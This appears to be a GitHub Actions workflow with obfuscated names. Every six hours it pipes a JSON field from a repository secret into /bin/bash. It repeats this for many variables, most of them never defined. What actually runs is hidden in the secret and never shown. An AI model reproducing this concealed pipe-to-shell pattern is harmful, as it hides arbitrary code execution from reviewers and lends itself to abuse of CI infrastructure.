name: huanglongxing1987

on:
  workflow_dispatch:
  schedule:
    - cron: '23 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huanglongxing1987
        env:
          cq2141: ${{ secrets.cq2141 }}
        run: |
          echo $cq2141 | jq -r .ovsgd365 | /bin/bash
          echo $u02 | jq -r .vq018 | /bin/bash
          echo $amum26 | jq -r .dpje0271 | /bin/bash
          echo $pibgp553 | jq -r .jfie0 | /bin/bash
          echo $mqs03907 | jq -r .okrxq50 | /bin/bash
          echo $vzjw6 | jq -r .mbkr6053 | /bin/bash
          echo $w68 | jq -r .xhb970 | /bin/bash
          echo $l7929 | jq -r .frw3 | /bin/bash
          echo $byw674 | jq -r .mcir76 | /bin/bash
          echo $matvk90 | jq -r .kpys99 | /bin/bash
          echo $sht73893 | jq -r .z1966 | /bin/bash
          echo $mm6 | jq -r .wka3 | /bin/bash
          echo $ivjql3 | jq -r .z0806 | /bin/bash
          echo $zjlsj8 | jq -r .nj072 | /bin/bash

